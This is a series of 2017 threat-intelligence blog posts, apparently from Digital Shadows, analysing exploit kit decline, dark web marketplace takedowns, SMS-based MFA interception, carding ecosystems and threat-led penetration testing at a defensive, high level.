    Geography of Leaked Credentials

    To learn more about data exposure and the results of Bitglass’ experiments, download the full report.

    Fluctuation in the Exploit Kit Market – Temporary Blip or Long-Term Trend? Wed, 16 Aug 2017 16:57:43 +0000 Exploit kit activity is waning. Collectively these malware distribution tools used to be a prominent method of infection. They rely on compromised websites, malicious adverts and social engineering to direct web traffic to their landing pages and attempt the exploitation of vulnerable software. Operated by various actors and groups, exploit kits possess different features, use various exploits and distribute different malware to victims. Since June 2016 at least four of the major players in this area ceased to be active. In this blog, I wanted to explore which exploit kits are still around and propose some plausible scenarios for the future of the exploit kit landscape.

    In memoriam

    Before we look at the active kits, let’s take a moment to remember those that have gone on to greener pastures (at least for now, some kits have a habit of rising from the dead). Note I’ve only referenced the major players from the last two years in this section:

    The survivors

    Despite these disappearances, the exploit kit landscape still represents a threat. Using mentions of exploit kits across social media and blogs that have been made by security researchers, we can formulate an indication of how active each exploit kit actually is. In the graph below, we can see that the RIG exploit kit has been mentioned most frequently from June until the time of writing; indicating it is likely to be the most prominent. All of the other kits shown in the graph, with the exception of Neutrino, still had some activity associated with them which showed they were still being deployed in the wild. Nevertheless, the rate at which they were detected and reported by researchers suggested they were likely less prevalent overall.

    Researcher mentions of exploit kit detections on social media and blog sites could provide reasonable insight into levels of exploit kit activity. Considering the findings, we assess it is highly likely the threat posed by EKs is less overall to what it was in June of 2016, and even the start of 2017. However, some exploit kits remain active and depending on the number of operators using them or the scale of the campaigns, the threat still remains. Exploit kits typically rely on out-of-date browsers, or browser plugins, therefore the primary mitigation for this threat is to ensure patches are implemented as soon as possible. In particular, exploit kit authors favor remote code execution exploits; our previous analysis of exploit kit payloads demonstrates this.

    Exploit Kit Activity

    Exploit Kit Mentions DarkWeb

     A potential reason for the decline of exploit kits

    The reasons for these disappearances were unconfirmed in most cases, but at least one EK developer was reported to have claimed it was no longer profitable.

    There were a number of other possible alternatives for this overall decline, including law enforcement action or the relatively resource intensive nature of exploit kit operations. Running these operations can be laborious:

    1. Software development of the exploit kit.
    2. Acquisition of remote code execution exploits for browser-related software
    3. Registration of large numbers of domains to host the exploit kits
    4. Generation of traffic to the exploit kit landing pages for exploitation. Generating this traffic requires the compromise of websites, use of malicious advertising or use of spam emails.

    Furthermore, exploit kit operators contend with advert blockers, software updates and blacklists which all degrade the rates of successful exploitation. All of these factors suggest a realistic possibility that exploit kit developers or operators no longer consider them to be profitable. At a time when spam phishing campaigns were frequently used to distribute ransomware, a demonstrably lucrative type of malware, distributing malware via exploit kits is almost certainly highly resource intensive by comparison. We’ve recently seen actors experimenting with malware propagation within internal networks, shown by the TrickBot and Emotet banking trojans, which represents another method of spreading malware to multiple devices.

    Are exploit kits dying out?

    Based on the exploit kit trends we have observed over the last year, it is a realistic possibility that these tools will continue to be used less frequently as part of malware distribution in the long term. The use of large quantities of phishing emails containing document attachments with embedded scripts to download malware has been proven to be highly popular and successful in the least year. Therefore, threat actors could possibly move from exploit kits to malware distribution using this type of methods.  However, there are multiple scenarios to consider:

    1. Given a lack of competition one exploit kit might become the most dominant.  Large amounts of business going to one kit could allow it to be developed more frequently and for its developers to acquire new exploits.
    2. Following the disappearance of large exploit kits, new kits could emerge that attempt to fill the market gap.
    3. Exploit kits could decline overall but still be used in more targeted attacks. The compromise of the Polish Financial Supervision Authority website in February of 2017 involved the use of similar tactics, techniques and procedures to exploit kits.
    4. Technology to detect and block malicious emails could improve to the point that this distribution method becomes less viable, resulting in a return to exploit kit activity which depends on end point management of software updates or other patch management solutions.

    Scenarios are useful because they provide us with indicators to look for when examining threat landscapes. While it’s not always possible to say with full confidence how the future might look, the thought exercise itself can be useful. Despite these potential scenarios, exploit kits will almost certainly continue to remain a threat in the immediate future.

    All That Twitterz Is Not Gold: Why You Need to Rely on Multiple Sources of Intelligence Wed, 09 Aug 2017 19:17:43 +0000 Twitter has become an extremely valuable tool for security researchers; experts including Kevin Beaumont and PwnAllTheThings frequently post research findings on the site and following these feeds can be an excellent source for the latest developments in the information security space. However, during major incidents affecting organizations worldwide, including the outbreaks of wCry and NotPetya, relying too heavily on Twitter can cause major problems for organizations scrambling to respond.

    Unwitting misinformation

    On May 12th, when the scale of the spread of wCry began to become apparent, researchers and businesses scrambled to ascertain how the malware was spreading as security operations analysts attempted to harden their networks against the threat. During this period, many users and some media outlets speculated that the malware might be spreading via an email vector.

    WCry Email Vector 

    Figure 1 – Screenshot of tweet on a supposed email vector for wCry.

    Even though little specific information was available, many users assumed that email had been the vector.

     WCry Email Vector2

    Figure 2 – Screenshot of tweet on a supposed email vector for wCry.

    While this might often be a safe assumption, spam email is by far the most common vector for ransomware delivery. In this case it was an unproven assumption it later emerged that a major contributor to the confusion was a spam campaign delivering the Jaff ransomware which was highly active on the same day. While it was not confirmed until later, throughout the afternoon of May 12th, multiple researchers accurately identified the true propagation vector used by wCry – SMB. Unfortunately, in some instances security advice was given on the basis of this understandable confusion, potentially leading to security operations personnel spending time hunting spam emails while a greater threat lay elsewhere.

     WCry Vector3

    Figure 3 – Notification from security software-as-a-service provider MailGuard.

    Information versus intelligence

    While potentially very useful, information derived from sources such as Twitter should always be treated with caution and assessed in the context of information derived from other sources, particularly when it’s being used to inform a security team’s actions in a time sensitive situation.

    This is the difference between information and intelligence; intelligence is aggregated data which has been assessed for credibility and presented in context with appropriate caveats for uncertainty and an assessment of significance. While intelligence must be timely to be useful, unassessed information which may be inaccurate can be even more damaging that the delay required to complete a full assessment.

    When the Digital Shadows analyst team investigated wCry on May 12th, we were able to identify indications that suggested spam emails were not the vector being used, leading us to pursue alternative hypotheses that the malware was spreading over SMB. While we are hugely appreciative of the work researchers do to raise awareness of security issues on Twitter and make extensive use of this source, we have found on many occasions that relying on this alone has the potential to lead to operational mistakes and misallocation of resources.

    Cybercrime Finds a Way, the Limited Impact of AlphaBay and Hansa’s Demise Mon, 07 Aug 2017 23:14:37 +0000 The law enforcement operations that took down the AlphaBay and Hansa marketplaces were meant to strike a sizable blow to the online trade of illegal goods and services. Frequenters of these services might now think twice before placing their trust in these unregulated platforms, and there may well be further arrests to follow as investigations and analysis into the materials seized in these raids run their course.

    However, when a drug enforcement operation completes a major bust or arrests a large number of individuals, there is often always another group, or new recruits, ready to fill the void. Similarly, our analysis of the broader cybercriminal ecosystem suggests that the impact of the AlphaBay and Hansa closures will be somewhat short-lived, for at least three reasons:

    1. The game of whack-a-mole continues, cybercrime will find a way

    With AlphaBay and Hansa out of the picture, sellers and users will flock to other marketplaces to continue trading as before. This has been evident already, with former AlphaBay and Hansa users advertising on established forums such as Dream Market, TradeRoute, House of Lions and Wall Street Market, which we focused on in our previous blog.

    Marketplace takedowns are not a new phenomenon. When Silk Road, once the largest and most popular dark web marketplace, was disrupted by the Federal Bureau of Investigation (FBI) in 2013, this only precipitated the growth of other, alternative platforms. AlphaBay grew from Silk Road’s closure and eventually took on the mantle of the most popular dark web market. Subsequent reincarnations of Silk Road in the form of Silk Road 2.0 and Silk Road 3.0 exemplify how the cycle will likely continue for the foreseeable future.  We have seen alternatives emerge as a result of marketplace exit scams as well. In 2015, administrators from the Evolution Marketplace stole an estimated 40,000 BTC. Dream Market was once of the beneficiaries of that exit scam.

    Just as Jeff Goldblum’s Jurassic Park character, Doctor Ian Malcolm says, “Life uh, finds a way,” cybercrime finds a way as well. Commerce must flow; buyers and sellers need to be connected.

    Cybercrime Finds a Way

    2. AlphaBay and Hansa were only a part of a broader cybercrime ecosystem

    Yes, AlphaBay and Hansa were two of the most popular English-language dark web marketplaces. And yes, they had dedicated sections for fraud-related goods (stolen payment card information, counterfeit documents, and compromised bank accounts), as well as malware and hacking tools (the RIG and Bleeding life exploit kits were previously advertised on AlphaBay). However, from an information security perspective, we should remember that most of the products advertised on these platforms were for drugs, weapons, and digital goods such as media accounts and service subscriptions.

    Our research shows that there are other forums specifically dedicated to hacking and security, which often act as a platform for trade. Sites like CrimeNet, HPC, and Exploit[.]in contain many examples of threat actors offering products such as ransomware variants, exploit kits, compromised accounts and payment card data. These sites work on a direct transfer system where vendors and customers will communicate directly to arrange payment, often through messaging services such as Jabber. Often sellers will advertise their products on these forums, and then direct users to dark web sites to then arrange payment. Where stolen databases have appeared on sites like Hansa, we assessed it to be highly likely that these datasets were previously traded widely through other criminal networks and then listed on these marketplaces only once their value had been exhausted.

    FileFrozr Ransomware

    Figure 1: Advert on deep  web forum HPC for FileFrozr ransomware

    Payment card fraud is a good example of why we should not focus too heavily on marketplaces. There are countless carding and Automated Vending Cart (AVC) sites dedicated to payment card fraud. These types of sites often provide tutorials and courses for novice fraudsters, as we highlight in our recent whitepaper. With new carding and AVC sites emerging every day, this type of activity will continue unabated despite the AlphaBay and Hansa takedowns.

    AVC Site

    Figure 2: AVC site allowing users to buy stolen payment card data

    3. Not all cybercrime occurs on the dark web

    Many carding, AVC and hacking sites are not actually found on the dark web, including HPC, CrimeNet and Exploit, which we mentioned above. Moreover, certain types of cybercrime do not need the “anonymity” provided by services such as Tor, or the advertising and transactional functions fulfilled by the marketplace model. Plenty of cybercrime occurs on the open and deep web.

    Extortion activity by the darkoverlord, a threat actor we have cited previously, illustrates this point. When the darkoverlord first came to our attention in June 2016, the actor relied heavily on dark web sites such as the Real Deal to advertise stolen datasets. Yet, since the closure of the Real Deal in November 2016, the darkoverlord has remained active and has made use of clear web sites such as Pastebin and Twitter to conduct extortion based activity. In June 2017, the darkoverlord released eight episodes of an un-aired American Broadcast company (ABC) show, posting a message to Pastebin that included a link to the torrent website The Pirate Bay. Three days later, the darkoverlord published over 6,000 medical records that allegedly belonged to a clinic in California. The documents were uploaded to the sharing site mega[.]nz after the clinic purportedly failed to respond to the ransom demands.

    While the AlphaBay and Hansa takedowns will likely provide significant intelligence gains, there will always be supply and demand for illicit goods and services. Digital Shadows will continue monitoring the development of the cybercriminal ecosystem, particularly in these turbulent times. Marketplaces were never seen as the go-to shop for rare exploits or sensitive datasets, and we expect the more sophisticated sellers to continue using more niche forums or private communication channels to flog their wares. Moreover, with other forms of cybercrime occurring outside of the dark web, organizations and individuals would be wrong to assume that the risk of a cyber-attack has now been significantly reduced.

    Reading Your Texts For Fun and Profit – How Criminals Subvert SMS-Based MFA Tue, 01 Aug 2017 13:57:24 +0000 Why Multi Factor?

    Read almost any cyber security related news and you will start to see why using a password alone isn’t the most secure way of preventing unauthorized access to your account. Multi-factor authentication (MFA) is invaluable because it adds extra obstacles for attackers attempting to access your account, hence why it has become such a popular account security control. There are different flavors of MFA ranging from codes sent via text (SMS), authentication applications, or physical devices. Naturally attackers are going to try and circumvent MFA, so we conducted some research into the ways SMS-based MFA could be subverted, which are outlined below.

    Threats to SMS Based Solutions

    Recently we came across a service that claimed to provide customers with the ability to redirect phone calls and text messages, advertised on at least one hacking forum for over a year and hosted on the Tor network (see Figure 1). Named “Interconnector” and offering “SS7 Services”, this was probably in reference to what is known as Signaling System No. 7 (SS7), a signaling language used to ensure that the networks of telecommunication companies can interoperate. For example, SS7 allows someone in one country to send messages to someone in another country. If this Interconnector service was genuine (although many forum users claimed it was a scam), it would almost certainly be deemed as valuable for threat actors. Why? Because the ability to intercept SMS messages would circumvent MFA protection which relies on tokens sent via this channel. This might include your social media accounts and your online bank accounts. It might even be used to authenticate online transactions.

    interconnector service

    Figure 1 – the “Interconnector” SS7 dark web service

    The abuse of SS7 for this purpose isn’t a pipe dream, there are at least a few examples of it being used maliciously in the past. In May 2017, it was reported that criminals had been able to access and steal funds from compromised bank accounts by redirecting SMS messages containing one time tokens and mobile transaction authorization numbers. There was also reporting in 2014 that a number of Ukrainian mobile subscribers’ phone calls had been redirected as a result of custom SS7 packets. The goal of the redirection is unknown at the time of writing.

    Although SS7 abuse is certainly interesting, MFA tokens can also be obtained via other means. For example, the Retefe banking trojan was used alongside mobile malware to harvest SMS codes, while the Dridex banking trojan harvested these codes and its operators used them in real time. Threat actors can also redirect messages and calls to different SIM cards; Wired published a report in June in which it claimed attackers were able to socially engineer employees at a telecommunications company in order to have a target’s calls and text messages redirected – otherwise known as “SIM Swapping”. Furthermore, so called “fake” mobile towers, or International Mobile Subscriber (IMSI) catchers, could also be used to intercept mobile traffic.

    All of these methods have their own limitations or requirements to be successful. All of them, for example, require an attacker to first obtain the relevant account credentials before they can consider intercepting MFA tokens. Furthermore, many of the examples we’ve highlighted in this blog require a relatively large amount of effort for the threat actors involved. Of these then, the abuse of SS7 would be most likely to be viable at scale, but the exact level of access and capability required to achieve such an attack isn’t entirely clear.

    Considering the Alternatives

    All of these methods and their use in the wild show that SMS-based two factor authentication (2FA) is not infallible and that criminals have an interest in circumventing it. In this context, it is unsurprising that NIST recommended in 2016 that “M” in MFA should not be SMS.

    Each method has its own advantages and disadvantages as well as capability requirements. However, someone with the appropriate capability and intent could successfully capture SMS-based MFA codes in order to access accounts, or conduct fraudulent transfers. There are some basic mitigation steps individuals could follow, including:

    1. Not clicking on links in suspicious or unsolicited emails or text messages
    2. Avoiding the download of mobile applications or games from unofficial stores
    3. Operate anti-virus solutions and keep them up to date
    4. Considering the use of alternative MFA such as authenticators such as hard tokens
    What is a Threat Model, and Why Organizations Should Care Mon, 31 Jul 2017 14:57:36 +0000 Many organizations are exquisitely aware that they are the target of a wide-range of cyber-attacks: from targeted intrusions to mere vandalism. Financial services companies, defense contractors, critical infrastructure providers are routine and expected targets. However, shifts in how interconnected and dependent organizations are have led to changes in how attackers see the value of a particular target. As mentioned in our previous blog “Keep your Eyes on the Prize”, how valuable an organization is to an attacker is not necessarily aligned with how important an organization sees itself. In order understand better the threats an organization faces; a threat model is typically developed.

    Threat Modeling Process

    Threat modeling is an iterative process that needs to be updated whenever there are substantial changes to either assets or threats. Typically the process consists of:

    1. Defining an organization’s assets – e.g., critical business processes, high-value systems, etc.
    2. Identifying which systems comprise those assets – e.g., databases, Enterprise Resource Planners (ERPs), etc.
    3. Creating a security profile for each system – e.g., which security controls are currently used to protect the identified software applications, such as, firewalls, Endpoint Detection and Response (EDR) systems, web proxies, etc. and which known vulnerabilities are present
    4. Identifying potential threats – e.g., hacktivists, cyber criminals, freelancers, nation states, etc.
    5. Prioritizing potential threats, and documenting adverse events and the actions taken in each case – e.g., working from known examples of documented attacks and internal risk concerns, attempting to foresee what the organizational impact of particular threats could be.

    If your organization does any of the following things, you may find the chosen case studies to be helpful in developing your own threat model:

    If you build things: if an organization builds devices which have internet connectivity, it needs a Secure Development Lifecycle (SDL).  The Mirai botnet illustrated this point by hijacking internet-connected devices which were not considered to be critical assets. The devices in question had default passwords and were connected to the public internet. Armed with a simple list of passwords, DVR appliances were readily compromised by Mirai and harnessed together to flood targets with up to 1.2Tbps of traffic.

    If you make software: widely-deployed or strategically-deployed software are both attractive targets for attackers. Backdooring carefully chosen software allows an attacker to gain access to a particular target. The Nyetna attack showed how a widely-deployed piece of software in a particular geography can become an extremely attractive target for attackers, effectively giving them access to over 400,000 endpoints with a single malicious update. The Havex malware was used in a campaign targeting Industrial Control Systems (ICS) by, among other vectors, backdooring the software installation files for three different ICS vendors. Compromises of this nature allow the attacker to have their malware deployed directly to their targets, most likely bypassing perimeter and other security controls.

    If you have an internet presence: attackers are always on the lookout for deniable infrastructure to use in their campaigns. Infrastructure that has a good level of connectivity and a poor security posture is ideal. It is no surprise that attackers such as the Equation Group used cloud hosted virtual machines and university computers to redirect traffic towards their targets. While asset owners may not consider their assets to be particularly sensitive, the value of having a reliable, deniable infrastructure which attackers can freely use for their own purposes is very high. The feasibility and speed of Internet-wide scanning means that vulnerable internet-connected machines do not remain undetected for long.

    If you store data: many organizations collect large amounts of data for their own purposes. In particular, data and metadata around how their customers are using their system. This data may well be part of an attacker’s collection requirements. The Equation Group compromise of Eastnets and potentially other SWIFT Service Bureaus shows that, while the organizations may consider security as part of their regular operations, they may face attacks from actors with a significantly higher capability than what they anticipated due to the perceived value of the data that they hold.

    Security is a global, pervasive responsibility for all organizations. It is clear that many organizations that did not consider themselves high value targets or with a high degree of responsibility for security may need to reconsider. Paranoia and hysteria are to be avoided, but a sober analysis of the real risks to an organization and, by extension, the other organizations or people it is a dependency for. An understanding attacker goals and security engineering principles, coupled with a robust approach to threat modelling, goes a long way to reducing the uncertainty around risk to an organization.

    Fraudsters Scoring Big – an Inside Look at the Carding Ecosystem Tue, 18 Jul 2017 18:52:49 +0000 In season two of the Netflix series Narcos, Pablo Escobar points out that: “I’m not a rich person. I’m a poor person with money.” In real-life, Escobar’s cartel reportedly made so much money (at one point $US420 million a week) that their chief accountant, Roberto Escobar, claimed that they “would write off 10% of the money because the rats would eat it in storage or it would be damaged by water or lost.” This “poor” person certainly had a lot of money.

    Online carding is another industry which is consistently lucrative for criminals, with payment card fraud to projected to reach $24 billion by the end of 2018. Our latest whitepaper reveals how criminals develop their capabilities and highlights a professional e-learning carding course, complete with webinars, instructors and reading material. This increased professionalization and sophistication of this fraud has negative implications for credit card companies, merchants and consumers.

     Online Carding Course

    Figure 1: An English translation of the carding course overview


    Whatever happened to EMV? Wasn’t payment card fraud meant to have been solved by the introduction of Chip and PIN? The implementation of EMV in the US has had its own problems. As I went to use my card over the weekend, I was prompted with the all-too-familiar message “No chip. Please swipe”.

    Chip not working 

    Figure 2: Many United States’ EMV terminals are disabled and force customers to swipe instead

    Recent research indicates that the increasing adoption of EMV has made physical card fraud more difficult, making Card Not Present (CNP) fraud more popular. CNP fraud occurs when the customer doesn’t physically present the card and uses card details online or over the phone. If we consider that annual online card spending will double to $6 trillion by 2021, this is a growth industry for cybercriminals.

    Just as in Narcos’ cocaine empire, CNP fraud is unlikely to be achieved by a criminal acting alone. They rely on a sophisticated ecosystem and support network that provides a wide range of credit card details, fraud tools and online tutorials. This includes:

    • Payment Card Data Harvesters – do the ‘dirty work’ in terms of harvesting the payment card information. This is done through intercepting card holder’s information whether this be through point of sale malware, skimming devices, phishing, breached databases, or through operating botnets
    • Distributors – are the ‘middle men’ who typically make the most money. While the criminals who harvest may use the card data themselves, they also sell it on to others who will package, repackage and sell on the card information
    • Fraudsters – run the most risk in terms of getting caught by law enforcement or being conned by fellow criminals. Once fraudsters have acquired payment card information from their distributor, the fraud can happen. These individuals tend to be less technical and attract a lower calibre of cybercriminal, often relying on online guides and courses to learn the latest techniques
    • Monetization – There are many different roles within the stage, including those who have been duped into operating drop addresses and those involved in the reselling of fraudulently acquired goods.

    Payment card fraud is not new, nor are online guides and courses for the fraudsters. However, the professionalism, reputation and freshness of this course provides useful insights for organizations across a range of industries as well as consumers. Download a copy of our latest paper to learn about the latest techniques and advice for merchants, payment card companies, and consumers.

    The Future of Marketplaces: Forecasting the Decentralized Model Mon, 17 Jul 2017 16:03:09 +0000 Last week we wrote about the disappearance of AlphaBay dark web marketplace and assessed three potential scenarios to look out for next. We briefly alluded to new models for criminal online commerce, such as those espoused by OpenBazaar. In this blog, we wanted to drill down into the drivers that would contribute to an increased interest in decentralized marketplaces.

    AlphaBay’s disappearance has highlighted a continuing problem with the marketplace model: users must trust site operators and other users who are anonymous, willing to commit crimes, and potentially untrustworthy. Other issues with the marketplace model include sites’ vulnerability to law enforcement; by targeting site operators law enforcement agencies can potentially seize servers and gather intelligence on users, shut a site down entirely, or even take it over and run it as a “honeypot”. In this case, a honeypot would be a deception operation in which law enforcement attempts to attract criminal actors engaged in illicit activity to use a law enforcement operated service in order to facilitate information gathering.

    An alternative model that precludes many of these issues is presented by P2P decentralized marketplaces, as recent reporting from DeepDotWeb  regarding a dark web marketplace project on the Ethereum platform dubbed “Tralfalmadore” has demonstrated.

    What is a Decentralized Marketplace?

    Decentralized marketplaces use blockchain technology: a project blockchain serves as the back-end for the marketplace, storing the necessary databases and code to support front-end user interfaces. All transactions are made using cryptocurrency and are recorded as smart contracts on the blockchain. This addresses problems with user trust — if all transactions are permanently and immutably recorded, vendors who attempt to scam other users can be more easily identified. Furthermore, platform operators have no control over listings and the platform is split among many nodes, making it highly resilient to law enforcement takedowns or attacks by other criminal actors.

    Forecasting Development

    In addition to Tralfalmadore, a project dubbed OpenBazaar has been active since Apr 2016. Despite its advantages over a traditional marketplace, the platform has not been used for criminal activity to any great extent and support for the decentralized model within the criminal ecosystem has remained low. Our monitoring of criminal sites has indicated that a significant proportion of former AlphaBay users have migrated to Hansa, another marketplace platform. Based on an examination of criminal forums and discussion boards, we have identified the following drivers likely to be significant in future development of decentralized criminal marketplaces.

    Decentralized Marketplace Table

    Figure 1 – Table of drivers likely to influence the development of decentralized criminal marketplaces.

    We assess that it is unlikely decentralized criminal marketplaces will become widely adopted in the near to mid-term future; at the time of writing, traditional marketplaces and P2P interactions on forums have remained by far the most common platforms for criminal commercial enterprises. Furthermore, no platform with popular appeal to criminal actors yet exists.

    However, if projects such as Tralfalmadore are able to become established, they are likely to become more widely used in the long term. Drivers identified in this article are likely to be viable measures for assessing the prospects of newly established decentralized criminal marketplaces.

    The potential future emergence of decentralized marketplaces within the criminal ecosystem poses significant challenges for law enforcement agencies and private security vendors. Although public blockchains can be freely mined for data, the very high volume of content is likely to make parsing this information and developing actionable intelligence very technically and logistically challenging. Furthermore, previous law enforcement operations targeting criminal marketplaces or forums have tended to revolve around targeting site operators or geolocating servers and conducting raids; neither of these would likely be effective for targeting a decentralized platform. In this scenario, it would be more effective to target individual prominent vendors or vendor networks and attempt to identify and locate them.

    Therefore, although decentralized marketplaces are unlikely to become significant within the criminal ecosystem in the near to mid-term future, they potentially represent a significant longer-term challenge for law enforcement and security vendors.

    AlphaBay Disappears: 3 Scenarios to Look For Next Fri, 14 Jul 2017 10:44:46 +0000 The AlphaBay dark web marketplace has been inaccessible since 05 Jul 2017. With no substantive explanation from the site’s owners, users have speculated that an either an exit scam (where administrators steal user cryptocurrency deposited to the marketplace and shut down the services) or law enforcement action has taken place. Dark web market exit scams are nothing new; the Evolution market exit scam infamously resulted in the loss of 40,000 bitcoins ($12 million). These exit scams are one of the risks when conducting business in criminal marketplaces. On 13 Jul 2017 the Wall Street Journal claimed that the disruption was caused by a combined US, Canadian and Thai law enforcement operation in which Canadian national Alexandre Cazes was arrested in Bangkok. Cazes, who was reportedly suspected of acting as an AlphaBay administrator, was reported to have committed suicide in Thai custody. At the time of writing there had been no official confirmation of the claims made by the Wall Street Journal. With each day that passes the prospect of AlphaBay returning becomes increasingly unlikely.

    So, what would a post-AlphaBay future look like? We believe there are at least three possible scenarios:

    1. An older, established marketplace will replace AlphaBay.

    As is often the case when a popular marketplace disappears, users will simply migrate to other established sites. Already we have seen former AlphaBay vendors advertising their products on other marketplaces, including Hansa and Dream Market. Sellers have leveraged their AlphaBay vendor ratings as a measure of their trustworthiness and reputation. Relocation is made easier as many established vendors and regular customers would have already had multiple accounts across the major markets.


    Figure 1: Hansa vendor highlighting their AlphaBay credentials

    With AlphaBay seemingly out of the picture, other sites will jostle for supremacy by trying to attract new users through advertising and membership deals. RS Club Market, for example, announced a referral offer on 09 Jul 2017 (a few days after AlphaBay’s disappearance) encouraging members to invite new users in return for 30% of the site’s commission fee. The House of Lions marketplace, similarly, has given AlphaBay sellers an opportunity to negotiate on the vendor fee if they can verify their experience and reputation.


    Figure 2: The House of Lions market has actively targeted former AlphaBay vendors

    Enlarging your customer base, however, brings its own challenges. Hansa users have reported issues with accessing the site in the last week. As Hansa does not require users to login to view products, a large increase in web traffic may have disrupted the service. Now Hansa administrators have been forced to suspend new registrations as the deal with “technical issues” caused by what they have called an “AlphaBay refugee” influx.


    Figure 3: Hansa has struggled to cope with the deluge of new registrations

    2. A new marketplace will arise from AlphaBay’s ashes

    Some AlphaBay users were so fond of their former haunt that they have created a new iteration of the marketplace, dubbed GammaBay. We discovered the following call to arms by a self-described AlphaBay veteran on Reddit: 


    Figure 4: Reddit post promoting GammaBay


    Figure 5: GammaBay site imitates the old AlphaBay design

    At this stage, the GammaBay site is still in its infancy, and the marketplace section remains unfinished. With only 20 members registered on the site so far, it is unlikely the new site will be able to reach the heights of its predecessor. Moreover, with rumors that AlphaBay had been disrupted by law enforcement, many users have expressed a reluctance to register for GammaBay, fearing that the site is actually a honey pot intended to lure in former AlphaBay vendors. Perceived trust in a market will play a large role in its chances of future success.


    Figure 6: Reddit user stating their suspicions about GammaBay

    3. Users will abandon the marketplace model and look for alternative solutions

    The fallout from AlphaBay’s disappearance could have far-reaching implications for the future of the marketplace model. If an exit scam has taken place, the declining trust in these markets may lead disillusioned users towards alternative methods for conducting online transactions. If law enforcement was responsible, then the risk of legal action will only encourage vendors to seek more secure and anonymized methods of trade.

    Although sites such as AlphaBay are very popular for goods such as drugs and credit card information, cybercriminals selling sensitive data or malware variants have frequently opted for direct peer-to-peer (P2P) communication and relationships made on specialized forums. While vendors and customers might lose the convenience of trading on a popular marketplace, they could decide that a P2P model will give them more control and help safeguard against exit scams and loss of funds.

    Following the seizure of Silk Road in 2013, some people began working on a new, fully-decentralized marketplace known as OpenBazaar. This open source project is a P2P marketplace that allows the unrestricted sale of goods between anonymous users. OpenBazaar is accessed through a front-end client which can be freely downloaded from the project website.  All transactions are made using Bitcoin and are recorded on the project Blockchain as cryptographically signed smart contracts.

    The Post-AlphaBay Future: Short- and Long-term Forecasts

    In the short-term, we assess that an existing marketplace such as Dream Market or Hansa will most likely fill AlphaBay’s shoes. The most successful marketplaces usually have a combination of: a user-friendly interface, administrator support services, attractive fee structures, and – crucially – a strong overall level of stability and reputation among the online community. As perhaps the two most established markets with the largest number of existing users, Dream Market and Hansa are best placed to capitalize. Nonetheless, as Hansa’s recent technical difficulties have highlighted, these sites will have to undertake improvements to ensure their user experience is in line with what members will demand. For Hansa and Dream Market, this will mean minimizing technical issues and refining their associated forum pages, which both pale in comparison to what the AlphaBay forum once offered.

    In the long-term, the fall of yet another popular dark web marketplace will only increase calls for a more secure, stable and trustworthy alternative to the current marketplace model. Here we believe P2P models such as that espoused by OpenBazaar have the potential to become increasingly attractive offerings to vendors and customers alike. It remains to be seen when a suitable platform will finally break through and disrupt the market. Digital Shadows will continue to track the demise of AlphaBay and its successors.

    Our next blog will explore the prospect of decentralized marketplaces in further detail.

    Threat Led Penetration Testing – The Past, Present and Future Mon, 10 Jul 2017 23:01:33 +0000 What is Threat Led Penetration Testing?

    Threat led penetration testing is, in essence, using threat intelligence to emulate the tactics, techniques and procedures (TTPs) of an adversary against a real time mission critical system. The concept is currently being implemented in a number of ‘flavors’ around the globe including schemes such as the UK’s STAR (Simulated Target Attack and Response) or CBEST scheme, the Netherlands TIBER (Threat Intelligence Based Ethical Red teaming) scheme and the Hong Kong based iCast schemes.

    The recent quarter has seen some extremely significant development within the realm of threat led penetration testing (TLPT). The concept of TLPT is rapidly expanding beyond the United Kingdom. TLPT advances the boundaries of conventional penetration testing by seeking to adopt the tactics, techniques and procedures of an advanced threat actor aggressively targeting a critical system. You can read more about TLPT in a previous blog. Our work with the first two Dutch TIBER projects, as well as our workshop at the Bahrain International Cyber Security Forum & Expo, are great examples of this.

    Given this expansion, I wanted to review of where the TLPT concept has come from and where it may be going to.

    The Past

    The origins of TLPT began with the UK’s CBEST scheme in 2013, to which Digital Shadows was a major contributor both in terms of the development of the original framework and the implementation of the actual projects.  Since then, there have been around fifty CBEST style engagements of which Digital Shadows has carried out the majority, from which three lessons have emerged:

    1. It has to be testable. Any testing scenario put forward by the Threat Intelligence provider has to be testable by the penetration test partner, with the scope of their capabilities. In practice this means less abseiling through open windows and more focus on technical exploits such as the indicators of compromise associated with specific threat groups.
    2. The importance of the ‘golden thread’. This is an easy concept to outline but a challenge to implement. As the report moves from the initial quantitative, data collection stages to the later, qualitative scenario building, the report should create activities linking data, information and intelligence into a “golden thread”. In practice doing this is really quite simple, for example taking client emails that have been implicated in various data breaches and focusing phishing campaigns against them.
    3. Creative versus effective scenarios. The culmination of a TLPT (the TI phase at least) all revolves around the attack scenario following the Exposition, Rising Action, Climax, Falling Action and Dénouement structure. While it can be tempting to devise elaborate scenarios, its important to remember that the core objective of a scenario is to successfully compromise the target system at the lowest level technically possible.

    The Present

    The CBEST scheme has been a huge success, which has led to the concept of TLPT being expanded beyond the financial services in the UK. Currently Hong Kong and the Netherlands have ‘in flight’ schemes with Singapore and the United States considering implementing their own proprietary schemes.

    • Sector diversification is happening, specifically across the telecoms, nuclear, wider energy and even space sectors. Although the sectors are varied, the principle of TLPT is the same – to test real time in flight critical systems using the TTPs of real world threat actors.
    • Regional expansion is rapidly occurring with Hong Kong, Singapore, The Netherlands and the USA all looking to develop and implement variants of TLPT.

    The Future

    it is worth a speculating about some of the features that I feel will become fixtures within TLPT in the future.

    • Iterative development of scenarios within the penetration test phase. Future TLPT will iteratively update the threat profiles based upon the results of the penetration test phase. This will result in a set of scenarios that are all viable but only under specific sets of circumstances. This would shift the current scenarios metric from ‘viable or not?’ to a more nuanced ‘viable under these circumstances. This could be a high-level insider threat with zero day vulnerability. This would create a situation where defenders could then assess the likelihood of a scenario coming to fruition based on the threat actor’s and level of defences.
    • Reuse of the result. On average, the results of a TLPT have a shelf life of between 18 and 24 months. Therefore, the organization has the opportunity to reuse the final result for a number of technical and non-technical exercises, such as a crisis management workshop for executive leadership.
    • Broader range of organizational testing. There is huge potential of TLPT to expand out from just being a technical test to encompass non-technical element of the client organization risk management framework, such as crisis management workshops and media management workshops.

    The success of the CBEST scheme and the subsequent expansion suggests that threat led penetration testing is an exciting trend. Of course, CBEST and TIBER are evolving rapidly, and so predicting the future adoption by providers and users is unknown. However, by building on past successes and learning lessons, threat led penetration testing could go from strength to strength.

